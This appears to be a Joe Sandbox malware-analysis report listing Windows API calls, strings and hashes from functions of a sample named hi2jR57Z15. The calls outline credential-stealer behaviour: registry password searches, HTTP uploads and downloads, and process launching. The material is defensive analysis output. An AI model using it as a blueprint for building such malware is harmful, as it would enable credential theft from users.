                                        • lstrlenA.KERNEL32(00000000), ref: 004153AE
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                        • API String ID: 3532888709-1526165396
                                        • Opcode ID: b1d7e1dd7000a380a64e46b97d31f8917f0d8cbb7df3e006fa875db069f3fff3
                                        • Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
                                        • Opcode Fuzzy Hash: b1d7e1dd7000a380a64e46b97d31f8917f0d8cbb7df3e006fa875db069f3fff3
                                        • Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A
                                        APIs
                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                          • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                          • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                        • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
                                        • StrCmpCA.SHLWAPI(?,00861C98), ref: 00406147
                                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
                                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
                                        • InternetReadFile.WININET(a+A,?,00000400,?), ref: 004061DC
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
                                        • CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
                                        • InternetCloseHandle.WININET(a+A), ref: 00406253
                                        • InternetCloseHandle.WININET(00000000), ref: 00406260
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                        • String ID: a+A$a+A
                                        • API String ID: 4287319946-2847607090
                                        • Opcode ID: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                        • Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
                                        • Opcode Fuzzy Hash: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                        • Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A
                                        APIs
                                          • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                        • memset.MSVCRT ref: 022F0E83
                                        • lstrcat.KERNEL32(?,00000000), ref: 022F0E9C
                                        • lstrcat.KERNEL32(?,00420D7C), ref: 022F0EAE
                                        • lstrcat.KERNEL32(?,00000000), ref: 022F0EC4
                                        • lstrcat.KERNEL32(?,00420D80), ref: 022F0ED6
                                        • lstrcat.KERNEL32(?,00000000), ref: 022F0EEF
                                        • lstrcat.KERNEL32(?,00420D84), ref: 022F0F01
                                        • lstrlen.KERNEL32(?), ref: 022F0F0E
                                        • memset.MSVCRT ref: 022F0F34
                                        • memset.MSVCRT ref: 022F0F48
                                          • Part of subcall function 022FAA87: lstrlen.KERNEL32(022E516C,?,?,022E516C,00420DDE), ref: 022FAA92
                                          • Part of subcall function 022FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022FAAEC
                                          • Part of subcall function 022F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 022F8DED
                                          • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                          • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                          • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 022FAC2C
                                          • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                          • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                          • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                          • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                          • Part of subcall function 022F9927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,022F0DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 022F9948
                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 022F0FC1
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 022F0FCD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                        • String ID:
                                        • API String ID: 1395395982-0
                                        • Opcode ID: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                        • Instruction ID: da5286b6c1f4342075c09c9871d0a00fb238edcb978981ae55dbee23abb1ddda
                                        • Opcode Fuzzy Hash: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                        • Instruction Fuzzy Hash: E081C4B5960318ABCB54EBE0CD51FEDB33AAF54304F0041B8A30A66185EF746B88CF59
                                        APIs
                                          • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                        • memset.MSVCRT ref: 022F0E83
                                        • lstrcat.KERNEL32(?,00000000), ref: 022F0E9C
                                        • lstrcat.KERNEL32(?,00420D7C), ref: 022F0EAE
                                        • lstrcat.KERNEL32(?,00000000), ref: 022F0EC4
                                        • lstrcat.KERNEL32(?,00420D80), ref: 022F0ED6
                                        • lstrcat.KERNEL32(?,00000000), ref: 022F0EEF
                                        • lstrcat.KERNEL32(?,00420D84), ref: 022F0F01
                                        • lstrlen.KERNEL32(?), ref: 022F0F0E
                                        • memset.MSVCRT ref: 022F0F34
                                        • memset.MSVCRT ref: 022F0F48
                                          • Part of subcall function 022FAA87: lstrlen.KERNEL32(022E516C,?,?,022E516C,00420DDE), ref: 022FAA92
                                          • Part of subcall function 022FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022FAAEC
                                          • Part of subcall function 022F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 022F8DED
                                          • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                          • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                          • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 022FAC2C
                                          • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                          • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                          • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                          • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                          • Part of subcall function 022F9927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,022F0DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 022F9948
                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 022F0FC1
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 022F0FCD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                        • String ID:
                                        • API String ID: 1395395982-0
                                        • Opcode ID: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                        • Instruction ID: ac176967de5fb3867c6909c9e6af5ed693eddf65447b3a085c33d8ad4c29ab4d
                                        • Opcode Fuzzy Hash: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                        • Instruction Fuzzy Hash: 0061C2B5520318ABCB14EBE0CD55FEDB33AAF54304F0041A9E70A66085EF746B88CF59
                                        APIs
                                          • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                          • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A51
                                          • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A68
                                          • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A7F
                                          • Part of subcall function 022E4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022E4AA0
                                          • Part of subcall function 022E4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022E4AB0
                                          • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 022E4B7C
                                        • StrCmpCA.SHLWAPI(?,0064A480), ref: 022E4BA1
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022E4D21
                                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,00421988,00000000,?,0064A514), ref: 022E504F
                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 022E506B
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 022E507F
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 022E50B0
                                        • InternetCloseHandle.WININET(00000000), ref: 022E5114
                                        • InternetCloseHandle.WININET(00000000), ref: 022E512C
                                        • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022E4D7C
                                          • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 022FAC2C
                                          • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                          • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                          • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                          • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                          • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                        • InternetCloseHandle.WININET(00000000), ref: 022E5136
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                        • String ID:
                                        • API String ID: 2402878923-0
                                        • Opcode ID: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                        • Instruction ID: 428fb1100e1cadadf9836ee14c8428e5761dbd7bdab5e8ca480bdcbb685a5d21
                                        • Opcode Fuzzy Hash: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                        • Instruction Fuzzy Hash: B4120172920318AADB55EBD4DD61FEEF37ABF24700F5041A9A20A62194DF742F88CF51
                                        APIs
                                          • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                          • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A51
                                          • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A68
                                          • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A7F
                                          • Part of subcall function 022E4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022E4AA0
                                          • Part of subcall function 022E4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022E4AB0
                                          • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                        • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 022E6548
                                        • StrCmpCA.SHLWAPI(?,0064A480), ref: 022E656A
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022E659C
                                        • HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022E65EC
                                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 022E6626
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 022E6638
                                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 022E6664
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 022E66D4
                                        • InternetCloseHandle.WININET(00000000), ref: 022E6756
                                        • InternetCloseHandle.WININET(00000000), ref: 022E6760
                                        • InternetCloseHandle.WININET(00000000), ref: 022E676A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                        • String ID:
                                        • API String ID: 3074848878-0
                                        • Opcode ID: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                        • Instruction ID: 16035b640c0b77a34e830471f83ccd06d1a59b4b07deb65ff81c87adbe2a1765
                                        • Opcode Fuzzy Hash: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                        • Instruction Fuzzy Hash: E1718175A60318ABDF24DFE0CC55BEEB779FB04700F5041A9E20A6B194DBB46A84CF41
                                        APIs
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 022F92D3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateGlobalStream
                                        • String ID:
                                        • API String ID: 2244384528-0
                                        • Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                        • Instruction ID: b0434be742c0746a594443f5d8fea33a4f3366bf1a05af96f231236494e43c4f
                                        • Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                        • Instruction Fuzzy Hash: 5271FBB9A50208ABDB14DFE4DC94FEEB7BAFF49700F108118F605A7294DB74A944CB61
                                        APIs
                                        • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
                                        • memset.MSVCRT ref: 0041716A
                                        • ??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE
                                        Strings
                                        • sA, xrefs: 004172AE, 00417179, 0041717C
                                        • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                                        • sA, xrefs: 00417111
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: OpenProcesslstrcpymemset
                                        • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                        • API String ID: 224852652-2614523144
                                        • Opcode ID: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                        • Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
                                        • Opcode Fuzzy Hash: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                        • Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D
                                        APIs
                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 022F77A9
                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 022F77E6
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022F786A
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 022F7871
                                        • wsprintfA.USER32 ref: 022F78A7
                                          • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                        • String ID: :$C$\$B
                                        • API String ID: 1544550907-183544611
                                        • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                        • Instruction ID: 6f845194738d481f2f77a7ac568bb1bcdfb6103f691d242acdd6c4b18408c96a
                                        • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                        • Instruction Fuzzy Hash: 42416EB1D50258AFDB10DFD4CC55BEEFBB9AF48700F0001A9E609A7284D7756A84CFA5
                                        APIs
                                          • Part of subcall function 004072D0: memset.MSVCRT ref: 00407314
                                          • Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                          • Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                          • Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                          • Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                          • Part of subcall function 004072D0: HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                        • lstrcatA.KERNEL32(00000000,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
                                        • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00407648
                                        • lstrcatA.KERNEL32(00000000, : ), ref: 0040765A
                                        • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040768F
                                        • lstrcatA.KERNEL32(00000000,00421804), ref: 004076A0
                                        • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076D3
                                        • lstrcatA.KERNEL32(00000000,00421808), ref: 004076ED
                                        • task.LIBCPMTD ref: 004076FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                        • String ID: :
                                        • API String ID: 3191641157-3653984579
                                        • Opcode ID: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                        • Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
                                        • Opcode Fuzzy Hash: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                        • Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66
                                        APIs
                                        • lstrcpy.KERNEL32(?,?), ref: 022F1642
                                          • Part of subcall function 022F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022F9072
                                          • Part of subcall function 022F94C7: StrStrA.SHLWAPI(?,?), ref: 022F94D3
                                        • lstrcpy.KERNEL32(?,00000000), ref: 022F167E
                                          • Part of subcall function 022F94C7: lstrcpyn.KERNEL32(0064AB88,?,?), ref: 022F94F7
                                          • Part of subcall function 022F94C7: lstrlen.KERNEL32(?), ref: 022F950E
                                          • Part of subcall function 022F94C7: wsprintfA.USER32 ref: 022F952E
                                        • lstrcpy.KERNEL32(?,00000000), ref: 022F16C6
                                        • lstrcpy.KERNEL32(?,00000000), ref: 022F170E
                                        • lstrcpy.KERNEL32(?,00000000), ref: 022F1755
                                        • lstrcpy.KERNEL32(?,00000000), ref: 022F179D
                                        • lstrcpy.KERNEL32(?,00000000), ref: 022F17E5
                                        • lstrcpy.KERNEL32(?,00000000), ref: 022F182C
                                        • lstrcpy.KERNEL32(?,00000000), ref: 022F1874
                                          • Part of subcall function 022FAA87: lstrlen.KERNEL32(022E516C,?,?,022E516C,00420DDE), ref: 022FAA92
                                          • Part of subcall function 022FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022FAAEC
                                        • strtok_s.MSVCRT ref: 022F19B7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                        • String ID:
                                        • API String ID: 4276352425-0
                                        • Opcode ID: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                        • Instruction ID: 18389550f3c9e082d2bd29bee8bc349f5229a06e593f3e1caf754dbf6cc559f3
                                        • Opcode Fuzzy Hash: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                        • Instruction Fuzzy Hash: DE719BB6960318ABCB54EBF0DD88EEEB37A6F55300F0045ACE20DA2144EE755B84CF61
                                        APIs
                                        • memset.MSVCRT ref: 00407314
                                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                        • RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                        • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                        • HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                          • Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B
                                        • task.LIBCPMTD ref: 00407555
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                        • String ID: Password
                                        • API String ID: 2698061284-3434357891
                                        • Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                        • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                                        • Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                        • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5
                                        APIs
                                        • lstrcatA.KERNEL32(?,0085FFE0,?,00000104,?,00000104,?,00000104,?,00000104), ref: 004147DB
                                          • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                        • lstrcatA.KERNEL32(?,00000000), ref: 00414801
                                        • lstrcatA.KERNEL32(?,?), ref: 00414820
                                        • lstrcatA.KERNEL32(?,?), ref: 00414834
                                        • lstrcatA.KERNEL32(?,0085C8A0), ref: 00414847
                                        • lstrcatA.KERNEL32(?,?), ref: 0041485B
                                        • lstrcatA.KERNEL32(?,00860770), ref: 0041486F
